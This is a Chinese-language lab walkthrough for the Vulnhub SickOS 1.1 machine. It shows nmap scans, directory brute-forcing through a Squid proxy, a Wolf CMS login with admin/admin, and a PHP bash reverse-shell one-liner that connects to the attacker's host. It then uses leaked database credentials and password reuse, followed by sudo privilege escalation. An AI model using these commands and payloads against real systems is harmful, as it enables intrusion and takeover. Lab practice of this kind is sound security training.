Vulnhub靶机实操笔记-SickOS1.1-解法一

2023-07-02 11:16:24 浏览数 (3)

摘要

Vulnhub靶机实操笔记-SickOS1.1-解法一

涉及知识内容:目录扫描、squid代理使用、CMS利用、sudo 内网提权

一、Namp扫描

1、主机存活判断

代码语言:javascript复制
sudo nmap -sn 192.168.32.0/24

2、快速扫描

以不低于1w的速度快速扫描端口

代码语言:javascript复制
sudo nmap --min-rate 10000 -p- 192.168.32.137

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

代码语言:javascript复制
sudo nmap -sT -sV -O -p22,3128,8080 192.168.32.137

4、UDP扫描

代码语言:javascript复制
sudo nmap -sU -p22,3128,8080 192.168.32.137

5、Namp的POC扫描

代码语言:javascript复制
sudo nmap --script=vuln -p22,3128,8080 192.168.32.137

二、目录扫描--squid代理服务器情况

1、访问squid

访问一下端口3128,泄露包版本是squid3.1.19

碰到不会问度娘,得知squid 是一个代理服务器

2、尝试爆破目录

代码语言:javascript复制
sudo dirb http://192.168.32.137 -p http://192.168.32.137:3128
 #这边使用-p 使用代理 前面有提到squid是一个代理服务器并运行这代理服务
 不用-p代理是扫不出目录的

访问前面扫描出来的结果,但和刚才相同得利用代理才能成功访问我们的url

访问robots.txt提示wolfcms http://192.168.32.137/robots.txt

拼接路径 http://192.168.32.137/wolfcms

三、Wolf cms突破

1、弱口令

发现一个疑似admin目录的url,我们进行一个拼接操作,访问到了后台登陆界面

http://192.168.32.137/wolfcms/?/admin/login

尝试弱口令 admin/admin 登陆进入后台

2、反弹shell

通过查看发现能够写php代码,随即写了一句话木马,尝试反弹shell

用google搜索php一句话木马写法如下

代码语言:javascript复制
php reverse shell one-line

将我们php的一句话木马写入

代码语言:javascript复制
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.32.131/443 0&1'");?>

kali启动监听

由于我们是在Articles中写的一句话,就去Articles栏目下去寻找触发点,发现点击Articles栏目条时触发了一句话木马成功获得shell

四、内网提权

1、查看系统详情

可以看到这台机子名字就叫SickOs

代码语言:javascript复制
uname -a

2、查看系统用户信息

重点查看有 /bash/bin 的用户

代码语言:javascript复制
cat /etc/passwd

3、查看配置文件

拿些内网后查看到当前路径有config.php文件,也就是配置文件。一般这种文件会存储一些数据库账户密码等配置信息,一定要认真看一看。

使用 vi 去打开config.php,vi有高亮帮助我们更好的看到关键信息。如下图看到数据库的账户密码

4、尝试暴力破解

目前获得两个密码,一个是wolf cmd系统的admin/admin,另一个是数据库账户密码 root/john@123

将cat etc/passwd 中获得的账户且有/bin/sh人机交互的账户尝试去碰撞一下已获得的密码,最后获得sickos/john@123

5、sudo 提权

还是一样先看系统详情,查看当前用户的权限。发现是三个ALL,果断用sudo挂载提权,最后获得root权限

代码语言:javascript复制
 uname -a #看系统详情
 sudo -l #查看当前用户的权限
 sudo /bin/bash #sudo提权挂载bash

五、靶场下载链接

https://download.vulnhub.com/sickos/sick0s1.1.7z

0 人点赞